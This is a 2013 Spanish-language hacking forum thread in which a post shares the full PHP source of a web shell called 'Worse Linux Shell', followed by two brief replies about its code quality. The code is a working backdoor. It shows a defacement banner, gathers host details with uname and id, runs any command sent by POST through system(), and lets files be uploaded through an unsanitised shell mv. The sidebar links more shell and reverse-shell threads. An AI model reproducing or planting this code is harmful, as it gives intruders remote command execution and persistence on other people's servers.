Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

[PHP] Worse Linux Shell

  • 2 Respuestas
  • 4062 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5499
  • Actividad:
    18.33%
  • Reputación 36
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Marzo 04, 2013, 11:04:23 pm »
Worse Linux Shell en PHP

Código: PHP
  1. <?php
  2.  
  3.  
  4. print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
  5. print "<center><h1>#worst @dal.net</h1></center>";
  6. print "<center><h1>You have been hack By Shany with Love To #worst.</h1></center>";
  7. print "<center><h1>Watch Your system Shany was here.</h1></center>";
  8. print "<center><h1>Linux Shells</h1></center>";
  9. print "<hr><hr>";
  10.  
  11. $currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
  12. $currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
  13.  
  14. $UName  = `uname -a`;
  15. $SCWD   = `pwd`;
  16. $UserID = `id`;
  17.  
  18. if( $currentWD == "" ) {
  19.     $currentWD = $SCWD;
  20. }
  21.  
  22. print "<table>";
  23. print "<tr><td><b>We are:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
  24. print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
  25. print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
  26. print "<tr><td><b>Our permissions:</b></td><td>$UserID</td></tr>";
  27. print "</table>";
  28.  
  29. print "<hr><hr>";
  30.  
  31. if( $_POST['_act'] == "List files!" ) {
  32.     $currentCMD = "ls -la";
  33. }
  34.  
  35. print "<form method=post enctype=\"multipart/form-data\"><table>";
  36.  
  37. print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
  38. print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
  39.  
  40. print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
  41. print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
  42.  
  43. print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
  44. print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
  45.  
  46. print "</table></form><hr><hr>";
  47.  
  48. $currentCMD = str_replace("\\\"","\"",$currentCMD);
  49. $currentCMD = str_replace("\\\'","\'",$currentCMD);
  50.  
  51. if( $_POST['_act'] == "Upload!" ) {
  52.     if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
  53.         print "<center><b>Error while uploading file!</b></center>";
  54.     } else {
  55.         print "<center><pre>";
  56.         system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
  57.         print "</pre><b>File uploaded successfully!</b></center>";
  58.     }    
  59. } else {
  60.     print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
  61.     $currentCMD = "cd ".$currentWD.";".$currentCMD;
  62.     system($currentCMD);
  63.     print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
  64. }
  65.  
  66.  
  67. ?>
  68.  


Desconectado alexander1712

  • *
  • Underc0der
  • Mensajes: 851
  • Actividad:
    5%
  • Reputación -2
    • Ver Perfil
    • El blog del programador
    • Email
« Respuesta #1 en: Marzo 25, 2013, 12:22:22 pm »
la idea está bien bien, pasa que el code está un poco feito, tendríamos que pegarle una retocada jejeje.

saludos!

Desconectado Xt3mP

  • *
  • Underc0der
  • Mensajes: 432
  • Actividad:
    0%
  • Reputación 0
  • Ellos me están buscando, pero yo los encontraré.
    • MSN Messenger - Xt3mP@h4x0rz.us
    • AOL Instant Messenger - Xt3mP@h4x0rz.us
    • Yahoo Instant Messenger - Xt3mP@h4x0rz.us
    • Ver Perfil
    • Xt3mP
« Respuesta #2 en: Marzo 26, 2013, 05:40:49 pm »
Por algo el título de "Worse linux shell", la peor shell para linux jejeje
Cada vez que me das Karma me motivas

 

¿Te gustó el post? COMPARTILO!



Reverse Shell Django

Iniciado por hdbreaker

Respuestas: 0
Vistas: 3915
Último mensaje Octubre 01, 2014, 12:40:08 am
por hdbreaker
Fenix Shell (C99 Traducido)

Iniciado por ANTRAX

Respuestas: 13
Vistas: 10904
Último mensaje Mayo 27, 2016, 12:28:12 pm
por blackdrake
Python Web Shell WSO 0.1 - Undetectable By WAF

Iniciado por sm0ke

Respuestas: 0
Vistas: 3766
Último mensaje Mayo 17, 2018, 01:54:19 am
por sm0ke
Priv Shell Scanner!

Iniciado por Mayk0

Respuestas: 0
Vistas: 3211
Último mensaje Mayo 07, 2013, 08:45:20 pm
por Mayk0
[ASP] Rader Shell

Iniciado por ANTRAX

Respuestas: 0
Vistas: 3722
Último mensaje Febrero 14, 2013, 02:17:37 pm
por ANTRAX